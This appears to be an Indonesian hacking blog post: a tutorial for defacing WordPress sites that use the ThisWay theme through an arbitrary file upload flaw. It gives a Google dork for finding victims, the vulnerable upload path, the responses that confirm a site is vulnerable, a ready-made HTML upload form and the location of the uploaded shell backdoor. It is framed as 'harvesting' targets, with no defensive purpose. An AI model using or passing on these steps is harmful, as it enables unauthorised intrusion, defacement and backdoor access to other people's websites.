Pada postingan kali ini saya akan menjelaskan bagaimana Deface WordPress ThisWay
Arbitrary File Upload
Exploit ini termasuk exploit lama yang sudah jarang sekali di gunakan pada defacer saat ini. tapi jangan salah loh... masih banyak website yang terdapat bug pada exploit ini.
Oke tanpa basa basi... *asek*
Pertama masukan dork ini di kolom mesin pencarian google/search engine
- inurl:/wp-content/themes/ThisWay/ site:com
Site bisa di ubah ubah, kembangin lagi biar siap panen. hahaha...
Lalu masukan exploit ini :
/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php
- example :
http://target.com/[patch]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php
Apabila keluar tulisan seperti ini
{"status":"NOK","ERR":"This file is incorect"} atau Blank kemungkinan besar website tersebut Vuln. namun apabila keluar Error 404 dan sebagainya berarti tidak vuln
Lalu pastekan script CSRF berikut di notepad, lalu save dengan ekstensi .html
<form action="http://target.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php" enctype="multipart/form-data" method="post">
<input name="Filedata" type="file" />
<input name="submit" type="submit" value="Submit" />
</form>
Pada tulisan "http://target.com/" di ubah dengan alamat website target kalian oke ! ;)
Kalo sudah di simpan di notepad dengan .html, lalu buka file itu > pilih shell backdoor > tinggal klik upload deh...
Nanti keluar result/tulisan seperti ini :
{"status":"OK","imageID":12,"imageName":"settingimage_namarandomnameshell.php"}
Bila tidak nongol tulisan kaya gitu, cari target lain
Akses shell backdoor kalian di
- http://www.target.com/wp-content/uploads/[tahun]/[bulan]/settingsimage_randomnameshell.php
Example :
- http://target.com/wp-content/uploads/2016/09/settingsimage_c99326695523.php
Oke sekian tutorial kali ini...
Ingat ! jangan merusak, titip file aja oke ^_^
Semoga bermanfaat
0 Response to "Deface WordPress ThisWay Arbitrary File Upload"
Post a Comment